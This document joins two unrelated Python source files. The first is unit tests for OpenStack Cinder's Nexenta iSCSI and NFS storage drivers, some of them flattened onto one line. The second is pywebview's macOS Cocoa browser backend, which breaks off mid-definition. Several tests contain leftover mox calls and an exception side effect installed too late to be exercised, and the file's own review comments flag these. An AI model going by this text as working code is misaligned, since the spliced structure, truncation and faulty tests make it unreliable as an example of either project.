        volume = self.TEST_VOLUME_REF
        host = {
            'capabilities': {
                'vendor_name': 'Nexenta',
                'location_info': 'NexentaISCSIDriver:1.1.1.1:cinder',
                'free_capacity_gb': 1,
                'iscsi_target_portal_port': 3260,
                'nms_url': 'http://admin:password@1.1.1.1:2000'
            }
        }
        snapshot = {
            'volume_name': volume['name'],
            'name': 'cinder-migrate-snapshot-%s' % volume['id'],
        }
        volume_name = 'cinder/%s' % volume['name']
        self.nms_mock.appliance.ssh_list_bindings.return_value = (
            {'0': [True, True, True, '1.1.1.1']})
        self.nms_mock.zvol.get_child_props.return_value = None
        self.drv.migrate_volume(None, volume, host)
        self.nms_mock.zvol.create_snapshot.assert_called_with(
            'cinder/%s' % volume['name'], snapshot['name'], '')
        # The driver replicates via rrmgr with the configured compression,
        # TCP buffer size and connection count.
        src = '%(volume)s/%(zvol)s@%(snapshot)s' % {
            'volume': 'cinder',
            'zvol': volume['name'],
            'snapshot': snapshot['name']
        }
        dst = '1.1.1.1:cinder'
        cmd = ' '.join(['rrmgr -s zfs -c 1 -q -e -w 1024 -n 2', src, dst])
        self.nms_mock.appliance.execute.assert_called_with(cmd)
        snapshot_name = 'cinder/%(volume)s@%(snapshot)s' % {
            'volume': volume['name'],
            'snapshot': snapshot['name']
        }
        self.nms_mock.snapshot.destroy.assert_called_with(snapshot_name, '')
        self.nms_mock.zvol.destroy.assert_called_with(volume_name, '')
        self.nms_mock.snapshot.destroy.assert_called_with(
            'cinder/%(volume)s@%(snapshot)s' % {
                'volume': volume['name'],
                'snapshot': snapshot['name']
            }, '')
        self.nms_mock.volume.object_exists.assert_called_with(volume_name)
        # NOTE(review): stray mox call in a mock-based test -- looks like a
        # leftover from a mox->mock conversion; confirm and remove.
        self.mox.ReplayAll()

    def test_create_snapshot(self):
        self.drv.create_snapshot(self.TEST_SNAPSHOT_REF)
        self.nms_mock.zvol.create_snapshot.assert_called_with(
            'cinder/volume1', 'snapshot1', '')

    def test_create_volume_from_snapshot(self):
        self.drv.create_volume_from_snapshot(self.TEST_VOLUME_REF2,
                                             self.TEST_SNAPSHOT_REF)
        self.nms_mock.zvol.clone.assert_called_with(
            'cinder/volume1@snapshot1', 'cinder/volume2')

    def test_delete_snapshot(self):
        self._create_volume_db_entry()
        self.drv.delete_snapshot(self.TEST_SNAPSHOT_REF)
        self.nms_mock.snapshot.destroy.assert_called_with(
            'cinder/volume1@snapshot1', '')
        self.nms_mock.volume.object_exists.assert_called_with(
            'cinder/volume1')
        # Check that exception not raised if snapshot does not exist
        # NOTE(review): side_effect is installed AFTER this second call, so
        # the "does not exist" path is never actually exercised here --
        # confirm the intended ordering.
        self.drv.delete_snapshot(self.TEST_SNAPSHOT_REF)
        self.nms_mock.snapshot.destroy.side_effect = (
            exception.NexentaException('does not exist'))
        self.nms_mock.snapshot.destroy.assert_called_with(
            'cinder/volume1@snapshot1', '')
        self.nms_mock.volume.object_exists.assert_called_with(
            'cinder/volume1')

    def _mock_all_export_methods(self, fail=False):
        # Verify the full export call sequence against nms_mock.
        self.assertTrue(self.nms_mock.stmf.list_targets.called)
        self.nms_mock.iscsitarget.create_target.assert_called_with(
            {'target_name': 'iqn:1.1.1.1-0'})
        self.nms_mock.stmf.list_targetgroups()
        zvol_name = 'cinder/volume1'
        self.nms_mock.stmf.create_targetgroup.assert_called_with(
            'cinder/1.1.1.1-0')
        self.nms_mock.stmf.list_targetgroup_members.assert_called_with(
            'cinder/1.1.1.1-0')
        self.nms_mock.scsidisk.lu_exists.assert_called_with(zvol_name)
        self.nms_mock.scsidisk.create_lu.assert_called_with(zvol_name, {})

    def _stub_all_export_methods(self):
        # Prime nms_mock so an export starts from an empty appliance state.
        self.nms_mock.scsidisk.lu_exists.return_value = False
        self.nms_mock.scsidisk.lu_shared.side_effect = (
            exception.NexentaException(['does not exist for zvol']))
        self.nms_mock.scsidisk.create_lu.return_value = {'lun': 0}
        self.nms_mock.stmf.list_targets.return_value = []
        self.nms_mock.stmf.list_targetgroups.return_value = []
        self.nms_mock.stmf.list_targetgroup_members.return_value = []
        self.nms_mock._get_target_name.return_value = ['iqn:1.1.1.1-0']
        self.nms_mock.iscsitarget.create_targetgroup.return_value = ({
            'target_name': 'cinder/1.1.1.1-0'})
        self.nms_mock.scsidisk.add_lun_mapping_entry.return_value = {'lun': 0}

    def test_create_export(self):
        self._stub_all_export_methods()
        retval = self.drv.create_export({}, self.TEST_VOLUME_REF, None)
        self._mock_all_export_methods()
        location = '%(host)s:%(port)s,1 %(name)s %(lun)s' % {
            'host': self.cfg.nexenta_host,
            'port': self.cfg.nexenta_iscsi_target_portal_port,
            'name': 'iqn:1.1.1.1-0',
            'lun': '0'
        }
        self.assertEqual({'provider_location': location}, retval)

    def test_ensure_export(self):
        self._stub_all_export_methods()
        self.drv.ensure_export({}, self.TEST_VOLUME_REF)
        self._mock_all_export_methods()

    def test_remove_export(self):
        self.nms_mock.stmf.list_targets.return_value = ['iqn:1.1.1.1-0']
        self.nms_mock.stmf.list_targetgroups.return_value = (
            ['cinder/1.1.1.1-0'])
        self.nms_mock.stmf.list_targetgroup_members.return_value = (
            ['iqn:1.1.1.1-0'])
        self.drv.remove_export({}, self.TEST_VOLUME_REF)
        self.assertTrue(self.nms_mock.stmf.list_targets.called)
        self.assertTrue(self.nms_mock.stmf.list_targetgroups.called)
        self.nms_mock.scsidisk.delete_lu.assert_called_with('cinder/volume1')

    def test_get_volume_stats(self):
        # Appliance reports sizes with a unit suffix; the driver converts to GB.
        stats = {'size': '5368709120G',
                 'used': '5368709120G',
                 'available': '5368709120G',
                 'health': 'ONLINE'}
        self.nms_mock.volume.get_child_props.return_value = stats
        stats = self.drv.get_volume_stats(True)
        self.assertEqual('iSCSI', stats['storage_protocol'])
        self.assertEqual(5368709120.0, stats['total_capacity_gb'])
        self.assertEqual(5368709120.0, stats['free_capacity_gb'])
        self.assertEqual(20, stats['reserved_percentage'])
        self.assertFalse(stats['QoS_support'])

    def _create_volume_db_entry(self):
        # Insert a minimal volume row so driver calls that hit the DB succeed.
        vol = {
            'id': '1',
            'size': 1,
            'status': 'available',
            'provider_location': self.TEST_VOLUME_NAME
        }
        return db.volume_create(self.ctxt, vol)['id']


class TestNexentaNfsDriver(test.TestCase):
    """Tests for the Nexenta NFS driver (truncated in this chunk)."""

    TEST_EXPORT1 = 'host1:/volumes/stack/share'
    TEST_NMS1 = 'http://admin:nexenta@host1:2000'

    TEST_EXPORT2 = 'host2:/volumes/stack/share'
    TEST_NMS2 = 'http://admin:nexenta@host2:2000'

    TEST_EXPORT2_OPTIONS = '-o intr'

    TEST_FILE_NAME = 'test.txt'
    TEST_SHARES_CONFIG_FILE = '/etc/cinder/nexenta-shares.conf'
    TEST_SHARE_SVC = 'svc:/network/nfs/server:default'

    TEST_SHARE_OPTS = {
        'read_only': '',
        'read_write': '*',
        'recursive': 'true',
        'anonymous_rw': 'true',
        'extra_options': 'anon=0',
        'root': 'nobody'
    }

    def _create_volume_db_entry(self):
        vol = {
            'id': '1',
            'size': 1,
            'status': 'available',
            'provider_location': self.TEST_EXPORT1
        }
        return db.volume_create(self.ctxt, vol)['id']

    def setUp(self):
        super(TestNexentaNfsDriver, self).setUp()
        self.ctxt = context.get_admin_context()
        self.cfg = mock.Mock(spec=conf.Configuration)
        self.cfg.nexenta_dataset_description = ''
        self.cfg.nexenta_shares_config = None
        self.cfg.nexenta_mount_point_base = '$state_path/mnt'
        self.cfg.nexenta_sparsed_volumes = True
        self.cfg.nexenta_dataset_compression = 'on'
        self.cfg.nexenta_dataset_dedup = 'off'
        self.cfg.nexenta_rrmgr_compression = 1
        self.cfg.nexenta_rrmgr_tcp_buf_size = 1024
        self.cfg.nexenta_rrmgr_connections = 2
        self.cfg.nfs_mount_point_base = '/mnt/test'
        self.cfg.nfs_mount_options = None
        self.cfg.nas_mount_options = None
        self.cfg.nexenta_nms_cache_volroot = False
        self.cfg.nfs_mount_attempts = 3
        self.cfg.reserved_percentage = 20
        self.cfg.max_over_subscription_ratio = 20.0
        self.nms_mock = mock.Mock()
        for mod in ('appliance', 'folder', 'server', 'volume', 'netstorsvc',
                    'snapshot', 'netsvc'):
            setattr(self.nms_mock, mod, mock.Mock())
        self.nms_mock.__hash__ = lambda *_, **__: 1
        self.stubs.Set(jsonrpc, 'NexentaJSONProxy',
                       lambda *_, **__: self.nms_mock)
        # NOTE(review): the source chunk is truncated here mid-statement;
        # the remainder of setUp lies outside this view.
        self.drv =
nfs.NexentaNfsDriver(configuration=self.cfg) self.drv.shares = {} self.drv.share2nms = {} def test_check_for_setup_error(self): self.drv.share2nms = { 'host1:/volumes/stack/share': self.nms_mock } self.nms_mock.server.get_prop.return_value = '/volumes' self.nms_mock.volume.object_exists.return_value = True self.nms_mock.folder.object_exists.return_value = True share_opts = { 'read_write': '*', 'read_only': '', 'root': 'nobody', 'extra_options': 'anon=0', 'recursive': 'true', 'anonymous_rw': 'true', } self.drv.check_for_setup_error() self.nms_mock.netstorsvc.share_folder.assert_called_with( 'svc:/network/nfs/server:default', 'stack/share', share_opts) self.nms_mock.server.get_prop.return_value = '/volumes' self.nms_mock.volume.object_exists.return_value = False self.assertRaises(LookupError, self.drv.check_for_setup_error) self.nms_mock.server.get_prop.return_value = '/volumes' self.nms_mock.volume.object_exists.return_value = True self.nms_mock.folder.object_exists.return_value = False self.assertRaises(LookupError, self.drv.check_for_setup_error) def test_initialize_connection(self): self.drv.shares = { self.TEST_EXPORT1: None } volume = { 'provider_location': self.TEST_EXPORT1, 'name': 'volume' } result = self.drv.initialize_connection(volume, None) self.assertEqual('%s/volume' % self.TEST_EXPORT1, result['data']['export']) def test_do_create_volume(self): volume = { 'provider_location': self.TEST_EXPORT1, 'size': 1, 'name': 'volume-1' } self.drv.shares = {self.TEST_EXPORT1: None} self.drv.share2nms = {self.TEST_EXPORT1: self.nms_mock} compression = self.cfg.nexenta_dataset_compression self.nms_mock.server.get_prop.return_value = '/volumes' self.nms_mock.netsvc.get_confopts('svc:/network/nfs/server:default', 'configure').AndReturn({ 'nfs_server_versmax': { 'current': u'3'}}) self.nms_mock.netsvc.get_confopts.return_value = { 'nfs_server_versmax': {'current': 4}} self.nms_mock._ensure_share_mounted.return_value = True self.drv._do_create_volume(volume) 
self.nms_mock.folder.create_with_props.assert_called_with( 'stack', 'share/volume-1', {'compression': compression}) self.nms_mock.netstorsvc.share_folder.assert_called_with( self.TEST_SHARE_SVC, 'stack/share/volume-1', self.TEST_SHARE_OPTS) mock_chmod = self.nms_mock.appliance.execute mock_chmod.assert_called_with( 'chmod ugo+rw /volumes/stack/share/volume-1/volume') mock_truncate = self.nms_mock.appliance.execute mock_truncate.side_effect = exception.NexentaException() self.nms_mock.server.get_prop.return_value = '/volumes' self.assertRaises(exception.NexentaException, self.drv._do_create_volume, volume) def test_create_sparsed_file(self): self.drv._create_sparsed_file(self.nms_mock, '/tmp/path', 1) self.nms_mock.appliance.execute.assert_called_with( 'truncate --size 1G /tmp/path') def test_create_regular_file(self): self.drv._create_regular_file(self.nms_mock, '/tmp/path', 1) self.nms_mock.appliance.execute.assert_called_with( 'dd if=/dev/zero of=/tmp/path bs=1M count=1024') def test_set_rw_permissions_for_all(self): path = '/tmp/path' self.drv._set_rw_permissions_for_all(self.nms_mock, path) self.nms_mock.appliance.execute.assert_called_with( 'chmod ugo+rw %s' % path) def test_local_path(self): volume = {'provider_location': self.TEST_EXPORT1, 'name': 'volume-1'} path = self.drv.local_path(volume) self.assertEqual( '$state_path/mnt/b3f660847a52b29ac330d8555e4ad669/volume-1/volume', path ) def test_remote_path(self): volume = {'provider_location': self.TEST_EXPORT1, 'name': 'volume-1'} path = self.drv.remote_path(volume) self.assertEqual('/volumes/stack/share/volume-1/volume', path) def test_share_folder(self): self.drv._share_folder(self.nms_mock, 'stack', 'share/folder') path = 'stack/share/folder' self.nms_mock.netstorsvc.share_folder.assert_called_with( self.TEST_SHARE_SVC, path, self.TEST_SHARE_OPTS) def test_load_shares_config(self): self.drv.configuration.nfs_shares_config = ( self.TEST_SHARES_CONFIG_FILE) config_data = [ '%s %s' % (self.TEST_EXPORT1, 
self.TEST_NMS1), '# %s %s' % (self.TEST_EXPORT2, self.TEST_NMS2), '', '%s %s %s' % (self.TEST_EXPORT2, self.TEST_NMS2, self.TEST_EXPORT2_OPTIONS) ] with mock.patch.object(self.drv, '_read_config_file') as \ mock_read_config_file: mock_read_config_file.return_value = config_data self.drv._load_shares_config( self.drv.configuration.nfs_shares_config) self.assertIn(self.TEST_EXPORT1, self.drv.shares) self.assertIn(self.TEST_EXPORT2, self.drv.shares) self.assertEqual(2, len(self.drv.shares)) self.assertIn(self.TEST_EXPORT1, self.drv.share2nms) self.assertIn(self.TEST_EXPORT2, self.drv.share2nms) self.assertEqual(2, len(self.drv.share2nms.keys())) self.assertEqual(self.TEST_EXPORT2_OPTIONS, self.drv.shares[self.TEST_EXPORT2]) def test_get_capacity_info(self): self.drv.share2nms = {self.TEST_EXPORT1: self.nms_mock} self.nms_mock.server.get_prop.return_value = '/volumes' self.nms_mock.folder.get_child_props.return_value = { 'available': '1G', 'used': '2G' } total, free, allocated = self.drv._get_capacity_info(self.TEST_EXPORT1) self.assertEqual(3 * units.Gi, total) self.assertEqual(units.Gi, free) self.assertEqual(2 * units.Gi, allocated) def test_get_share_datasets(self): self.drv.share2nms = {self.TEST_EXPORT1: self.nms_mock} self.nms_mock.server.get_prop.return_value = '/volumes' volume_name, folder_name = ( self.drv._get_share_datasets(self.TEST_EXPORT1)) self.assertEqual('stack', volume_name) self.assertEqual('share', folder_name) def test_delete_snapshot(self): self.drv.share2nms = {self.TEST_EXPORT1: self.nms_mock} self._create_volume_db_entry() self.nms_mock.server.get_prop.return_value = '/volumes' self.drv.delete_snapshot({'volume_id': '1', 'name': 'snapshot1'}) self.nms_mock.snapshot.destroy.assert_called_with( 'stack/share/volume-1@snapshot1', '') def test_delete_volume(self): self.drv.share2nms = {self.TEST_EXPORT1: self.nms_mock} self._create_volume_db_entry() self.drv._ensure_share_mounted = lambda *_, **__: 0 self.drv._execute = lambda *_, **__: 0 
self.nms_mock.server.get_prop.return_value = '/volumes' self.nms_mock.folder.get_child_props.return_value = None self.drv.delete_volume({ 'id': '1', 'name': 'volume-1', 'provider_location': self.TEST_EXPORT1 }) self.nms_mock.folder.destroy.assert_called_with( 'stack/share/volume-1', '-r') # Check that exception not raised if folder does not exist on # NexentaStor appliance. mock = self.nms_mock.folder.destroy mock.side_effect = exception.NexentaException('Folder does not exist') self.drv.delete_volume({ 'id': '1', 'name': 'volume-1', 'provider_location': self.TEST_EXPORT1 }) class TestNexentaUtils(test.TestCase): def test_str2size(self): values_to_test = ( # Test empty value (None, 0), ('', 0), ('0', 0), ('12', 12), # Test int values (10, 10), # Test bytes string ('1b', 1), ('1B', 1), ('1023b', 1023), ('0B', 0), # Test other units ('1M', units.Mi), ('1.0M', units.Mi), ) for value, result in values_to_test: self.assertEqual(result, utils.str2size(value)) # Invalid format value self.assertRaises(ValueError, utils.str2size, 'A') def test_str2gib_size(self): self.assertEqual(1, utils.str2gib_size('1024M')) self.assertEqual(300 * units.Mi // units.Gi, utils.str2gib_size('300M')) self.assertEqual(1.2 * units.Ti // units.Gi, utils.str2gib_size('1.2T')) self.assertRaises(ValueError, utils.str2gib_size, 'A') def test_parse_nms_url(self): urls = ( ('http://192.168.1.1/', (False, 'http', 'admin', 'nexenta', '192.168.1.1', '2000', '/rest/nms/')), ('http://192.168.1.1:8080', (False, 'http', 'admin', 'nexenta', '192.168.1.1', '8080', '/rest/nms/')), ('https://root:password@192.168.1.1:8080', (False, 'https', 'root', 'password', '192.168.1.1', '8080', '/rest/nms/')), ) for url, result in urls: self.assertEqual(result, utils.parse_nms_url(url))
""" (C) 2014-2018 Roman Sirokov and contributors Licensed under BSD license http://github.com/r0x0r/pywebview/ """ import sys import json import subprocess import webbrowser from threading import Event, Semaphore import Foundation import AppKit import WebKit from PyObjCTools import AppHelper from objc import nil, super, pyobjc_unicode from webview.localization import localization from webview import OPEN_DIALOG, FOLDER_DIALOG, SAVE_DIALOG, parse_file_type, escape_string, _js_bridge_call from webview.util import convert_string, parse_api_js from .js.css import disable_text_select # This lines allow to load non-HTTPS resources, like a local app as: http://127.0.0.1:5000 bundle = AppKit.NSBundle.mainBundle() info = bundle.localizedInfoDictionary() or bundle.infoDictionary() info['NSAppTransportSecurity'] = {'NSAllowsArbitraryLoads': Foundation.YES} class BrowserView: instances = {} app = AppKit.NSApplication.sharedApplication() debug = False cascade_loc = Foundation.NSMakePoint(100.0, 0.0) class AppDelegate(AppKit.NSObject): def applicationDidFinishLaunching_(self, notification): i = list(BrowserView.instances.values())[0] i.webview_ready.set() class WindowDelegate(AppKit.NSObject): def windowShouldClose_(self, window): i = BrowserView.get_instance('window', window) quit = localization['global.quit'] cancel = localization['global.cancel'] msg = localization['global.quitConfirmation'] if not i.confirm_quit or BrowserView.display_confirmation_dialog(quit, cancel, msg): return Foundation.YES else: return Foundation.NO def windowWillClose_(self, notification): # Delete the closed instance from the dict i = BrowserView.get_instance('window', notification.object()) del BrowserView.instances[i.uid] if BrowserView.instances == {}: AppHelper.callAfter(BrowserView.app.stop_, self) class JSBridge(AppKit.NSObject): def initWithObject_(self, api_instance): super(BrowserView.JSBridge, self).init() self.api = api_instance return self def callFunc_withParam_(self, func_name, param): 
if param is WebKit.WebUndefined.undefined(): param = None i = BrowserView.get_instance('js_bridge', self) _js_bridge_call(i.uid, self.api, func_name, param) def isSelectorExcludedFromWebScript_(self, selector): return Foundation.NO if selector == 'callFunc:withParam:' else Foundation.YES @classmethod def webScriptNameForSelector_(cls, selector): return 'call' if selector == 'callFunc:withParam:' else None class BrowserDelegate(AppKit.NSObject): def webView_contextMenuItemsForElement_defaultMenuItems_(self, webview, element, defaultMenuItems): if BrowserView.debug: return defaultMenuItems else: return nil # Display a JavaScript alert panel containing the specified message def webView_runJavaScriptAlertPanelWithMessage_initiatedByFrame_(self, webview, message, frame): AppKit.NSRunningApplication.currentApplication().activateWithOptions_(AppKit.NSApplicationActivateIgnoringOtherApps) alert = AppKit.NSAlert.alloc().init() alert.setInformativeText_(message) alert.runModal() # Display a JavaScript confirm panel containing the specified message def webView_runJavaScriptConfirmPanelWithMessage_initiatedByFrame_(self, webview, message, frame): ok = localization['global.ok'] cancel = localization['global.cancel'] if BrowserView.display_confirmation_dialog(ok, cancel, message): return Foundation.YES else: return Foundation.NO # Display an open panel for <input type="file"> element def webView_runOpenPanelForFileButtonWithResultListener_allowMultipleFiles_(self, webview, listener, allow_multiple): i = list(BrowserView.instances.values())[0] files = i.create_file_dialog(OPEN_DIALOG, '', allow_multiple, '', [], main_thread=True) if files: listener.chooseFilenames_(files) else: listener.cancel() def webView_printFrameView_(self, webview, frameview): """ This delegate method is invoked when a script or a user wants to print a webpage (e.g. 
using the Javascript window.print() method) :param webview: the webview that sent the message :param frameview: the web frame view whose contents to print """ def printView(frameview): # check if the view can handle the content without intervention by the delegate can_print = frameview.documentViewShouldHandlePrint() if can_print: # tell the view to print the content frameview.printDocumentView() else: # get an NSPrintOperaion object to print the view info = AppKit.NSPrintInfo.sharedPrintInfo().copy() # default print settings used by Safari info.setHorizontalPagination_(AppKit.NSFitPagination) info.setHorizontallyCentered_(Foundation.NO) info.setVerticallyCentered_(Foundation.NO) imageableBounds = info.imageablePageBounds() paperSize = info.paperSize() if (Foundation.NSWidth(imageableBounds) > paperSize.width): imageableBounds.origin.x = 0 imageableBounds.size.width = paperSize.width if (Foundation.NSHeight(imageableBounds) > paperSize.height): imageableBounds.origin.y = 0 imageableBounds.size.height = paperSize.height info.setBottomMargin_(Foundation.NSMinY(imageableBounds)) info.setTopMargin_(paperSize.height - Foundation.NSMinY(imageableBounds) - Foundation.NSHeight(imageableBounds)) info.setLeftMargin_(Foundation.NSMinX(imageableBounds)) info.setRightMargin_(paperSize.width - Foundation.NSMinX(imageableBounds) - Foundation.NSWidth(imageableBounds)) # show the print panel print_op = frameview.printOperationWithPrintInfo_(info) print_op.runOperation() AppHelper.callAfter(printView, frameview) # Open target="_blank" links in external browser def webView_decidePolicyForNewWindowAction_request_newFrameName_decisionListener_(self, webview, action, request, name, listener): if name == '_blank': webbrowser.open(request.URL().absoluteString(), 2, True) listener.ignore() # WebPolicyDelegate method, invoked when a navigation decision needs to be made def webView_decidePolicyForNavigationAction_request_frame_decisionListener_(self, webview, action, request, frame, 
listener): # The event that might have triggered the navigation event = AppKit.NSApp.currentEvent() action_type = action['WebActionNavigationTypeKey'] """ Disable back navigation on pressing the Delete key: """ # Check if the requested navigation action is Back/Forward if action_type == WebKit.WebNavigationTypeBackForward: # Check if the event is a Delete key press (keyCode = 51) if event and event.type() == AppKit.NSKeyDown and event.keyCode() == 51: # If so, ignore the request and return listener.ignore() return # Normal navigation, allow listener.use() # Show the webview when it finishes loading def webView_didFinishLoadForFrame_(self, webview, frame): # Add the webview to the window if it's not yet the contentView i = BrowserView.get_instance('webkit', webview) if i: if not webview.window(): i.window.setContentView_(webview) i.window.makeFirstResponder_(webview) if i.js_bridge: i._set_js_api() if not i.text_select: i.webkit.windowScriptObject().evaluateWebScript_(disable_text_select) i.loaded.set() class FileFilterChooser(AppKit.NSPopUpButton): def initWithFilter_(self, file_filter): super(BrowserView.FileFilterChooser, self).init() self.filter = file_filter self.addItemsWithTitles_([i[0] for i in self.filter]) self.setAction_('onChange:') self.setTarget_(self) return self def onChange_(self, sender): option = sender.indexOfSelectedItem() self.window().setAllowedFileTypes_(self.filter[option][1]) class WebKitHost(WebKit.WebView): def performKeyEquivalent_(self, theEvent): """ Handle common hotkey shortcuts as copy/cut/paste/undo/select all/quit :param theEvent: :return: """ if theEvent.type() == AppKit.NSKeyDown and theEvent.modifierFlags() & AppKit.NSCommandKeyMask: responder = self.window().firstResponder() keyCode = theEvent.keyCode() if responder != None: handled = False range_ = responder.selectedRange() hasSelectedText = len(range_) > 0 if keyCode == 7 and hasSelectedText : #cut responder.cut_(self) handled = True elif keyCode == 8 and hasSelectedText: 
#copy responder.copy_(self) handled = True elif keyCode == 9: # paste responder.paste_(self) handled = True elif keyCode == 0: # select all responder.selectAll_(self) handled = True elif keyCode == 6: # undo if responder.undoManager().canUndo(): responder.undoManager().undo() handled = True elif keyCode == 12: # quit BrowserView.app.stop_(self) return handled def __init__(self, uid, title, url, width, height, resizable, fullscreen, min_size, confirm_quit, background_color, debug, js_api, text_select, webview_ready): BrowserView.instances[uid] = self self.uid = uid if debug: BrowserView.debug = debug BrowserView._set_debugging() self.js_bridge = None self._file_name = None self._file_name_semaphore = Semaphore(0) self._current_url_semaphore = Semaphore(0) self.webview_ready = webview_ready self.loaded = Event() self.confirm_quit = confirm_quit self.title = title self.text_select = text_select self.is_fullscreen = False rect = AppKit.NSMakeRect(0.0, 0.0, width, height) window_mask = AppKit.NSTitledWindowMask | AppKit.NSClosableWindowMask | AppKit.NSMiniaturizableWindowMask if resizable: window_mask = window_mask | AppKit.NSResizableWindowMask # The allocated resources are retained because we would explicitly delete # this instance when its window is closed self.window = AppKit.NSWindow.alloc().\ initWithContentRect_styleMask_backing_defer_(rect, window_mask, AppKit.NSBackingStoreBuffered, False).retain() self.window.setTitle_(title) self.window.setBackgroundColor_(BrowserView.nscolor_from_hex(background_color)) self.window.setMinSize_(AppKit.NSSize(min_size[0], min_size[1])) self.window.setAnimationBehavior_(AppKit.NSWindowAnimationBehaviorDocumentWindow) BrowserView.cascade_loc = self.window.cascadeTopLeftFromPoint_(BrowserView.cascade_loc) # Set the titlebar color (so that it does not change with the window color) self.window.contentView().superview().subviews().lastObject().setBackgroundColor_(AppKit.NSColor.windowBackgroundColor()) self.webkit = 
BrowserView.WebKitHost.alloc().initWithFrame_(rect).retain() self._browserDelegate = BrowserView.BrowserDelegate.alloc().init().retain() self._windowDelegate = BrowserView.WindowDelegate.alloc().init().retain() self._appDelegate = BrowserView.AppDelegate.alloc().init().retain() self.webkit.setUIDelegate_(self._browserDelegate) self.webkit.setFrameLoadDelegate_(self._browserDelegate) self.webkit.setPolicyDelegate_(self._browserDelegate) self.window.setDelegate_(self._windowDelegate) BrowserView.app.setDelegate_(self._appDelegate) if url: self.url = url self.load_url(url) else: self.loaded.set() if js_api: self.js_bridge = BrowserView.JSBridge.alloc().initWithObject_(js_api) if fullscreen: self.toggle_fullscreen() def show(self): self.window.makeKeyAndOrderFront_(self.window) if not BrowserView.app.isRunning(): # Add the default Cocoa application menu self._add_app_menu() self._add_view_menu() BrowserView.app.activateIgnoringOtherApps_(Foundation.YES) BrowserView.app.run() else: self.webview_ready.set() def destroy(self): AppHelper.callAfter(self.window.close) def set_title(self, title): def _set_title(): self.window.setTitle_(title) AppHelper.callAfter(_set_title) def toggle_fullscreen(self): def toggle(): if self.is_fullscreen: window_behaviour = 1 << 2 # NSWindowCollectionBehaviorManaged else: window_behaviour = 1 << 7 # NSWindowCollectionBehaviorFullScreenPrimary self.window.setCollectionBehavior_(window_behaviour) self.window.toggleFullScreen_(None) AppHelper.callAfter(toggle) self.is_fullscreen = not self.is_fullscreen def get_current_url(self): def get(): self._current_url = self.webkit.mainFrameURL() self._current_url_semaphore.release() AppHelper.callAfter(get) self._current_url_semaphore.acquire() return self._current_url def load_url(self, url): def load(url): page_url = Foundation.NSURL.URLWithString_(url) req = Foundation.NSURLRequest.requestWithURL_(page_url) self.webkit.mainFrame().loadRequest_(req) self.loaded.clear() self.url = url 
AppHelper.callAfter(load, url) def load_html(self, content, base_uri): def load(content, url): url = Foundation.NSURL.URLWithString_(url) self.webkit.mainFrame().loadHTMLString_baseURL_(content, url) self.loaded.clear() AppHelper.callAfter(load, content, base_uri) def evaluate_js(self, script): def evaluate(script): result = self.webkit.windowScriptObject().evaluateWebScript_(script) JSResult.result = None if result is WebKit.WebUndefined.undefined() or result == 'null' else json.loads(result) JSResult.result_semaphore.release() class JSResult: result = None result_semaphore = Semaphore(0) self.loaded.wait() AppHelper.callAfter(evaluate, script) JSResult.result_semaphore.acquire() return JSResult.result def _set_js_api(self): script = parse_api_js(self.js_bridge.api) self.webkit.windowScriptObject().evaluateWebScript_(script) pwv_obj = self.webkit.windowScriptObject().valueForKey_('pywebview') pwv_obj.setValue_forKey_(self.js_bridge, '_bridge') def create_file_dialog(self, dialog_type, directory, allow_multiple, save_filename, file_filter, main_thread=False): def create_dialog(*args): dialog_type = args[0] if dialog_type == SAVE_DIALOG: save_filename = args[2] save_dlg = AppKit.NSSavePanel.savePanel() save_dlg.setTitle_(localization["global.saveFile"]) if directory: # set initial directory save_dlg.setDirectoryURL_(Foundation.NSURL.fileURLWithPath_(directory)) if save_filename: # set file name save_dlg.setNameFieldStringValue_(save_filename) if save_dlg.runModal() == AppKit.NSFileHandlingPanelOKButton: file = save_dlg.filenames() self._file_name = tuple(file) else: self._file_name = None else: allow_multiple = args[1] open_dlg = AppKit.NSOpenPanel.openPanel() # Enable the selection of files in the dialog. open_dlg.setCanChooseFiles_(dialog_type != FOLDER_DIALOG) # Enable the selection of directories in the dialog. 
open_dlg.setCanChooseDirectories_(dialog_type == FOLDER_DIALOG) # Enable / disable multiple selection open_dlg.setAllowsMultipleSelection_(allow_multiple) # Set allowed file extensions if file_filter: open_dlg.setAllowedFileTypes_(file_filter[0][1]) # Add a menu to choose between multiple file filters if len(file_filter) > 1: filter_chooser = BrowserView.FileFilterChooser.alloc().initWithFilter_(file_filter) open_dlg.setAccessoryView_(filter_chooser) open_dlg.setAccessoryViewDisclosed_(True) if directory: # set initial directory open_dlg.setDirectoryURL_(Foundation.NSURL.fileURLWithPath_(directory)) if open_dlg.runModal() == AppKit.NSFileHandlingPanelOKButton: files = open_dlg.filenames() self._file_name = tuple(files) else: self._file_name = None if not main_thread: self._file_name_semaphore.release() if main_thread: create_dialog(dialog_type, allow_multiple, save_filename) else: AppHelper.callAfter(create_dialog, dialog_type, allow_multiple, save_filename) self._file_name_semaphore.acquire() return self._file_name def _add_app_menu(self): """ Create a default Cocoa menu that shows 'Services', 'Hide', 'Hide Others', 'Show All', and 'Quit'. Will append the application name to some menu items if it's available. 
""" # Set the main menu for the application mainMenu = AppKit.NSMenu.alloc().init() self.app.setMainMenu_(mainMenu) # Create an application menu and make it a submenu of the main menu mainAppMenuItem = AppKit.NSMenuItem.alloc().init() mainMenu.addItem_(mainAppMenuItem) appMenu = AppKit.NSMenu.alloc().init() mainAppMenuItem.setSubmenu_(appMenu) appMenu.addItemWithTitle_action_keyEquivalent_(self._append_app_name(localization["cocoa.menu.about"]), "orderFrontStandardAboutPanel:", "") appMenu.addItem_(AppKit.NSMenuItem.separatorItem()) # Set the 'Services' menu for the app and create an app menu item appServicesMenu = AppKit.NSMenu.alloc().init() self.app.setServicesMenu_(appServicesMenu) servicesMenuItem = appMenu.addItemWithTitle_action_keyEquivalent_(localization["cocoa.menu.services"], nil, "") servicesMenuItem.setSubmenu_(appServicesMenu) appMenu.addItem_(AppKit.NSMenuItem.separatorItem()) # Append the 'Hide', 'Hide Others', and 'Show All' menu items appMenu.addItemWithTitle_action_keyEquivalent_(self._append_app_name(localization["cocoa.menu.hide"]), "hide:", "h") hideOthersMenuItem = appMenu.addItemWithTitle_action_keyEquivalent_(localization["cocoa.menu.hideOthers"], "hideOtherApplications:", "h") hideOthersMenuItem.setKeyEquivalentModifierMask_(AppKit.NSAlternateKeyMask | AppKit.NSCommandKeyMask) appMenu.addItemWithTitle_action_keyEquivalent_(localization["cocoa.menu.showAll"], "unhideAllApplications:", "") appMenu.addItem_(AppKit.NSMenuItem.separatorItem()) # Append a 'Quit' menu item appMenu.addItemWithTitle_action_keyEquivalent_(self._append_app_name(localization["cocoa.menu.quit"]), "terminate:", "q") def 